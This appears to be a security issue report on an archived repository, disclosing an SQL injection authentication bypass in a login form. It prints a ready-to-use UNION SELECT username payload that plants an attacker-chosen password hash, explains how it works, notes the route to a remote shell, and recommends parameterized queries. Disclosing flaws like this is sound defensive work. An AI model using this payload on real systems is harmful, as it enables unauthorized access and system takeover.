This repository was archived by the owner on Sep 23, 2022. It is now read-only.
This repository was archived by the owner on Sep 23, 2022. It is now read-only.
SQL Injection based authentication bypass in login form #1
Description
Submitting a tailored credential pair allows for SQL injection, leading to authentication bypass.
This is done by setting the username to
DOESNOTEXIST' UNION SELECT '$2y$10$woi3e0Fd.JeXz882gZHHQOBu7BzJ7Z3EzQ6IUxBZ4d3rEFw5zk2..'; -- -
and the password to "password" (without quotes) and performing a login attempt.
The key points:
- DOESNOTEXIST is a string meant to prevent false positives. This prevents the original SQL query from matching (unless a user called DOESNOTEXIST really does exist - you can change this string to something random then.
- $2y$10...k2.. is the password hash for the password "password" (without quotes)
- password is submitted as the password
The union select forces the attacker controlled password hash into the list of hashes matching the user (thus, since no user is named DOESNOTEXIST, returns nothing - meaning the only result is the attacker-controlled one), which then matches against the password that the attacker also supplies. This fools the system into believing the attacker has supplied valid credentials and grants full access to the control panel. From there, an attacker can create an interactive command session on the target and gain control over the system directly via a remote shell.
This exploit IS NOT CONTINGENT upon preexisting conditions or user interaction, and ranks a 9.7 (Critical) CVSS score.
Recommendation: use parameterization to prevent SQL injection in all places where user input is passed to the database.